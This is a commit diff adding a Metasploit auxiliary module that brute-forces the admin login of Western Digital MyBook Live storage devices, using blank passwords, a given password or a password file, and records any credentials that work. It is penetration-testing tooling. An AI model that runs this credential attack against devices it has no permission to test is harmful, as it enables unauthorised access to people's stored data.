|
| 1 | +## |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'metasploit/framework/credential_collection' |
| 8 | +require 'metasploit/framework/login_scanner/mybook_live' |
| 9 | + |
| 10 | +class Metasploit3 < Msf::Auxiliary |
| 11 | + include Msf::Auxiliary::Scanner |
| 12 | + include Msf::Exploit::Remote::HttpClient |
| 13 | + include Msf::Auxiliary::Report |
| 14 | + include Msf::Auxiliary::AuthBrute |
| 15 | + |
| 16 | + def initialize |
| 17 | + super( |
| 18 | + 'Name' => 'Western Digital MyBook Live Login Utility', |
| 19 | + 'Description' => 'This module simply attempts to login to a Western Digital MyBook Live instance using a specific user/pass.', |
| 20 | + 'Author' => [ 'Nicholas Starke <starke.nicholas[at]gmail.com>' ], |
| 21 | + 'License' => MSF_LICENSE |
| 22 | + ) |
| 23 | + |
| 24 | + register_options( |
| 25 | + [ |
| 26 | + Opt::RPORT(80) |
| 27 | + ], self.class) |
| 28 | + |
| 29 | + register_autofilter_ports([ 80 ]) |
| 30 | + |
| 31 | + # username is hardcoded into application |
| 32 | + deregister_options('RHOST', 'USERNAME', 'USER_FILE', 'USER_AS_PASS', 'DB_ALL_USERS') |
| 33 | + end |
| 34 | + |
| 35 | + def setup |
| 36 | + super |
| 37 | + # They must select at least blank passwords, provide a pass file or a password |
| 38 | + one_required = %w(BLANK_PASSWORDS PASS_FILE PASSWORD) |
| 39 | + unless one_required.any? { |o| datastore.has_key?(o) && datastore[o] } |
| 40 | + fail_with(Failure::BadConfig, "Invalid options: One of #{one_required.join(', ')} must be set") |
| 41 | + end |
| 42 | + if !datastore['PASS_FILE'] |
| 43 | + if !datastore['BLANK_PASSWORDS'] && datastore['PASSWORD'].blank? |
| 44 | + fail_with(Failure::BadConfig, "PASSWORD or PASS_FILE must be set to a non-empty string if not BLANK_PASSWORDS") |
| 45 | + end |
| 46 | + end |
| 47 | + end |
| 48 | + |
| 49 | + def run_host(ip) |
| 50 | + cred_collection = Metasploit::Framework::CredentialCollection.new( |
| 51 | + blank_passwords: datastore['BLANK_PASSWORDS'], |
| 52 | + pass_file: datastore['PASS_FILE'], |
| 53 | + password: datastore['PASSWORD'], |
| 54 | + username: 'admin' |
| 55 | + ) |
| 56 | + |
| 57 | + scanner = Metasploit::Framework::LoginScanner::MyBookLive.new( |
| 58 | + host: ip, |
| 59 | + port: rport, |
| 60 | + proxies: datastore['PROXIES'], |
| 61 | + cred_details: cred_collection, |
| 62 | + stop_on_success: datastore['STOP_ON_SUCCESS'], |
| 63 | + connection_timeout: 10, |
| 64 | + user_agent: datastore['UserAgent'], |
| 65 | + vhost: datastore['VHOST'] |
| 66 | + ) |
| 67 | + |
| 68 | + if ssl |
| 69 | + scanner.ssl = datastore['SSL'] |
| 70 | + scanner.ssl_version = datastore['SSLVERSION'] |
| 71 | + end |
| 72 | + |
| 73 | + scanner.scan! do |result| |
| 74 | + credential_data = result.to_h |
| 75 | + credential_data.merge!( |
| 76 | + module_fullname: fullname, |
| 77 | + workspace_id: myworkspace_id |
| 78 | + ) |
| 79 | + if result.success? |
| 80 | + credential_core = create_credential(credential_data) |
| 81 | + credential_data[:core] = credential_core |
| 82 | + create_credential_login(credential_data) |
| 83 | + |
| 84 | + print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}" |
| 85 | + else |
| 86 | + invalidate_login(credential_data) |
| 87 | + vprint_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})" |
| 88 | + end |
| 89 | + end |
| 90 | + end |
| 91 | +end |
0 commit comments